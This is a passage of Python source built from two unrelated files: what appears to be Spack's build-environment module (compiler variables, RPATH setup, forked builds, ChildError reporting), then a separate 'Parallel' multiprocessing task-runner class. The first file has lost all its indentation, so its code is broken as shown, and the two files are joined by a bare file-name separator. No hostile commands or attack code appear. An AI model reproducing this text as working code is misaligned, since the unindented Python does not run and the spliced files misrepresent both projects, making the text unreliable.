# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, pkg.spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(pkg.spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
environment = compiler.environment
for command, variable in iteritems(environment):
if command == 'set':
for name, value in iteritems(variable):
env.set(name, value)
elif command == 'unset':
for name, _ in iteritems(variable):
env.unset(name)
elif command == 'prepend-path':
for name, value in iteritems(variable):
env.prepend_path(name, value)
elif command == 'append-path':
for name, value in iteritems(variable):
env.append_path(name, value)
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# number of jobs spack will build with.
jobs = spack.config.get('config:build_jobs') or multiprocessing.cpu_count()
if not pkg.parallel:
jobs = 1
elif pkg.make_jobs:
jobs = pkg.make_jobs
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
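# Illustrative sketch (hypothetical library names): converting a PIC static
# archive with the module-scope helper set up in
# _set_variables_for_single_module.
#
#     static_to_shared_library('libfoo.a', version='1.2.3', compat_version='1')
#
# On Linux this produces libfoo.so.1.2.3 with soname libfoo.so.1, plus
# libfoo.so and libfoo.so.1 symlinks pointing at it.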
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
    Get the list of superclass modules that descend from spack.package.PackageBase.
    Includes cls.__module__.
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
spack_env = EnvironmentModifications()
run_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, spack_env)
set_build_environment_variables(pkg, spack_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, spack_env)
# traverse in postorder so package can use vars from its dependencies
spec = pkg.spec
for dspec in pkg.spec.traverse(order='post', root=False,
deptype=('build', 'test')):
spkg = dspec.package
set_module_variables_for_package(spkg)
# Allow dependencies to modify the module
dpkg = dspec.package
dpkg.setup_dependent_package(pkg.module, spec)
dpkg.setup_dependent_environment(spack_env, run_env, spec)
if (not dirty) and (not spack_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_environment(spack_env, run_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the spack_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(spack_env, tty.warn)
spack_env.apply_modifications()
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
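# Illustrative example (hypothetical package and paths) of the context lines
# built above; the failing source line is highlighted with '>>':
#
#     /spack/repos/builtin/packages/foo/package.py:37, in install:
#          35        def install(self, spec, prefix):
#          36            configure('--prefix=' + prefix)
#       >> 37            make('instal')
#          38            make('install')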
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
    Any subclass of InstallError will be annotated by Spack with a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
            # The error happened in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
|
core.py
|
import os
import dill
import time
import pprint
import random
import signal
import inspect
import logging
import platform
from typing import *
from tqdm import tqdm
from pathos.pools import ProcessPool
from multiprocessing import Process
from multiprocessing.managers import SyncManager
from ..misc import *
from ..manage import *
from ..misc import grouped
LINUX = platform.system() == "Linux"
dill._dill._reverse_typemap["ClassType"] = type
class Parallel(PureLoggingMixin):
"""
Util class which can help running tasks in parallel.
Warnings
----------
    On platforms other than Linux, functionality is dramatically reduced
    because only Linux fully supports the pickling this class relies on. In
    that case, `Parallel` simply leverages `pathos` to do the jobs.
Parameters
----------
num_jobs : int, number of jobs run in parallel.
    sleep : float, idle duration (in seconds) between checks for finished jobs.
    use_tqdm: bool, whether to show a progress bar (with tqdm) or not.
use_cuda: bool, whether tasks need CUDA or not.
name : str, summary name of these tasks.
meta_name : str, name of the meta information.
logging_folder : str, where the logging will be placed.
task_names : List[str], names of each task.
resource_config : Dict[str, Any], config used in `ResourceManager`.
Examples
----------
    >>> def add_one(x):
    ...     import time
    ...     time.sleep(1)
    ...     return x + 1
    ...
    >>> print(Parallel(10)(add_one, list(range(10))).parallel_results)
"""
class _ParallelError(Exception):
pass
def __init__(
self,
num_jobs: int,
*,
sleep: float = 1.0,
use_tqdm: bool = True,
use_cuda: bool = False,
name: Optional[str] = None,
meta_name: Optional[str] = None,
logging_folder: Optional[str] = None,
task_names: Optional[List[str]] = None,
tqdm_config: Optional[Dict[str, Any]] = None,
resource_config: Optional[Dict[str, Any]] = None,
warn_num_jobs: bool = True,
):
self._rs = None
self._use_tqdm, self._use_cuda = use_tqdm, use_cuda
self._num_jobs, self._sleep = num_jobs, sleep
if tqdm_config is None:
tqdm_config = {}
if resource_config is None:
resource_config = {}
if logging_folder is None:
logging_folder = os.path.join(os.getcwd(), "_parallel_", "logs")
self._tqdm_config = tqdm_config
self._resource_config = resource_config
self._name, self._meta_name = name, meta_name
self._logging_folder, self._task_names = logging_folder, task_names
self._refresh_patience = resource_config.setdefault("refresh_patience", 10)
self._init_logger(self.meta_log_name)
self._warn_num_jobs = warn_num_jobs
def __call__(self, f: Callable, *args_list: Any) -> "Parallel":
        # if f returns a dict with a 'terminate' key set to True, Parallel can
        # be terminated at an early stage
n_tasks = len(args_list[0])
n_jobs = min(self._num_jobs, n_tasks)
if self._task_names is None:
self._task_names = [None] * n_tasks
if not LINUX or n_jobs <= 1:
if LINUX and self._warn_num_jobs:
print(
f"{LoggingMixin.warning_prefix}Detected Linux system but "
f"n_jobs={n_jobs}, functions will be dramatically reduced.\n"
"* It is recommended to set n_jobs to a larger value"
)
results = []
task_names = list(map(self._get_task_name, range(n_tasks)))
if n_jobs <= 1:
iterator = (f(*args) for args in zip(*args_list))
else:
p = ProcessPool(ncpus=n_jobs)
iterator = p.imap(f, *args_list)
if self._use_tqdm:
iterator = tqdm(iterator, total=n_tasks, **self._tqdm_config)
for result in iterator:
results.append(result)
self._rs = dict(zip(task_names, results))
return self
self._func, self._args_list = f, args_list
self._cursor, self._all_task_indices = 0, list(range(n_jobs, n_tasks))
self._log_meta_msg("initializing sync manager")
self._sync_manager = SyncManager()
self._sync_manager.start(lambda: signal.signal(signal.SIGINT, signal.SIG_IGN))
meta = {"n_jobs": n_jobs, "n_tasks": n_tasks, "terminated": False}
self._rs = self._sync_manager.dict(
{
"__meta__": meta,
"__exceptions__": {},
}
)
self._overwritten_task_info = {}
self._pid2task_idx = None
self._log_meta_msg("initializing resource manager")
self._resource_manager = ResourceManager(
self._resource_config, self._get_task_name, self._refresh_patience
)
self._log_meta_msg("registering PC manager")
pc_manager = PCManager()
ram_methods = {
"get_pid_usage_dict": None,
"get_pid_usage": pc_manager.get_pid_ram_usage,
"get_available_dict": lambda: {"total": pc_manager.get_available_ram()},
}
self._resource_manager.register("RAM", ram_methods)
gpu_config = self._resource_config.setdefault("gpu_config", {})
default_cuda_list = None if self._use_cuda else []
available_cuda_list = gpu_config.setdefault(
"available_cuda_list", default_cuda_list
)
if available_cuda_list is None or available_cuda_list:
self._log_meta_msg("registering GPU manager")
if available_cuda_list is not None:
available_cuda_list = list(map(int, available_cuda_list))
gpu_manager = GPUManager(available_cuda_list)
gpu_methods = {
"get_pid_usage": None,
"get_pid_usage_dict": gpu_manager.get_pid_usages,
"get_available_dict": gpu_manager.get_gpu_frees,
}
self._resource_manager.register("GPU", gpu_methods)
self._resource_manager.register_logging(self._init_logger, self)
self._log_meta_msg("initializing with refreshing")
self._refresh(skip_check_finished=True)
self._working_processes = None
if not self._use_tqdm:
self._tqdm_bar = None
else:
self._tqdm_bar = tqdm(list(range(n_tasks)), **self._tqdm_config)
try:
self._log_meta_msg("initializing processes")
init_task_indices = list(range(n_jobs))
init_processes = [
self._get_process(i, start=False) for i in init_task_indices
]
if self.terminated:
self._user_terminate()
init_failed_slots, init_failed_task_indices = [], []
for i, (task_idx, process) in enumerate(
zip(init_task_indices, init_processes)
):
if process is None:
init_failed_slots.append(i)
init_failed_task_indices.append(task_idx)
task_name = self._get_task_name(task_idx)
self._log_with_meta(
task_name,
"initialization failed, it may due to lack of resources",
msg_level=logging.WARNING,
)
if init_failed_slots:
for slot in init_failed_slots:
init_task_indices[slot] = None
init_processes[slot] = [None] * 4
self._all_task_indices = (
init_failed_task_indices + self._all_task_indices
)
self._working_task_indices = init_task_indices
self._working_processes, task_info = map(list, zip(*init_processes))
self._log_meta_msg("starting all initial processes")
tuple(
map(
lambda p_: None if p_ is None else p_.start(),
self._working_processes,
)
)
tuple(
map(
self._record_process,
self._working_task_indices,
self._working_processes,
task_info,
)
)
self._resource_manager.initialize_running_usages()
self._log_meta_msg("entering parallel main loop")
while True:
self._log_meta_msg("waiting for finished slot")
self._wait_and_handle_finish(wait_until_finish=True)
if not self._add_new_processes():
break
except KeyboardInterrupt:
self.exception(self.meta_log_name, f"keyboard interrupted")
exceptions = self.exceptions
exceptions["base"] = self._ParallelError("Keyboard Interrupted")
self._rs["__exceptions__"] = exceptions
except Exception as err:
self.exception(self.meta_log_name, f"exception occurred, {err}")
exceptions = self.exceptions
exceptions["base"] = err
self._rs["__exceptions__"] = exceptions
finally:
self._log_meta_msg("joining processes left behind")
if self._working_processes is not None:
for process in self._working_processes:
if process is None:
continue
process.join()
if self._tqdm_bar is not None:
self._tqdm_bar.close()
self._log_meta_msg("casting parallel results to Python dict")
self._rs = dict(self._rs)
self._log_meta_msg("shutting down sync manager")
self._sync_manager.shutdown()
self.log_block_msg(
self.meta_log_name,
"parallel results",
pprint.pformat(self._rs, compact=True),
)
return self
def grouped(self, f: Callable, *args_list: Any) -> "Parallel":
num_jobs = min(len(args_list[0]), self._num_jobs)
grouped_args_list = [grouped_into(args, num_jobs) for args in args_list]
def _grouped_f(i: int, *args_list_: Tuple[Any], cuda: Any = None) -> List[Any]:
results: List[Any] = []
kwargs = {} if not self._use_cuda else {"cuda": cuda}
for args in tqdm(
zip(*args_list_),
total=len(args_list_[0]),
position=i + 1,
leave=False,
):
results.append(f(*args, **kwargs))
return results
return self(_grouped_f, list(range(num_jobs)), *grouped_args_list)
